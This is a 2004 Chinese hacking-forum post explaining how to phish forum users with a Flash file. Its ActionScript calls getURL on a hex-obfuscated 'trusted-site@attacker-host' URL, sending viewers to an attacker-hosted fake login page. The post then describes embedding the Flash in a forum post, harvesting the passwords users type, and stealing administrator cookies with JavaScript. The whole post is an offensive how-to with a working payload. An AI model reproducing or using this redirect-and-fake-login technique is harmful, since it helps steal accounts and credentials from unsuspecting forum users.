论坛: 菜鸟乐园 标题: URL欺骗之论坛应用篇 复制本贴地址    
作者: jwm3336 [jwm3336]    论坛用户   登录
配合本站发布的URL欺骗的方法一文特发此文:

测试论坛:第八军团论坛[只是测试一下页己,勿怪:)]

现在的论坛大多都允许发FLASH文件。

利用:
制作一个FLASH文件,在第一帧设置动作:
stop();
a="http://www.juntuan.net@%77%77%77%2E%67%78%67%6C%2E%63%6F%6D/%74%65%73%74/%6C%6F%67%69%6E%2E%70%68%70";
getURL(a);

输出为test.swf

制作一个页面逼真的论坛登录界面。把其和test.swf一起上传到自己的空间上。
我做好的swf文件存在 http://www.gxgl.com/test/test.swf
登录界面是 http://www.gxgl.com/test/login.php 声明:这个文件只是测试用,并未加上其它功能。

然后到第八军团论坛发表贴子。测试!

点击flash图标,填入http://www.gxgl.com/test/test.swf

然后找到这个贴子点击查看。

就会把浏览者指引到http://www.gxgl.com/test/login.php来了,而地址栏却仍是第八军团的地址。

浏览都会误以为本贴要登录才能查看,一般都会输入帐号信息登录。如果在这个文件加上存储功能,那么该浏览者的帐号信息就到手了。

-----------------------------------------------------------------

面对现在论坛的这个问题。可利用的还很多,只要你对JAVASCRIPT和AS熟悉,取管理员COOKIES,其它恶作剧等等都可轻易实现。



地主 发表时间: 04-01-19 23:27

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号